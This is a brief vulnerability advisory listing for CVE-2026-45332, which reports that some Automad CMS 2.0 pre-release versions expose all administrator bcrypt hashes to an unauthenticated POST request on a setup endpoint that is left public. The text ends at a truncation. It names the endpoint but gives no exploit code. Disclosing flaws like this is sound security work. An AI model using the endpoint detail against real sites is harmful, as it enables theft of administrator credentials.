HIGH
marcantondahmen
CVE published 2026-05-28
CVE-2026-45332
Automad flat-file CMS versions 2.0.0-alpha.1 through 2.0.0-beta.27 contain a Broken Access Control vulnerability that allows unauthenticated attackers to retrieve bcrypt password hashes for all administrator accounts via a single POST request to the `/_api/user-collection/create-first-user` endpoint. This setup endpoint remains publicly accessible after initial configuration and returns full serialized us [truncated]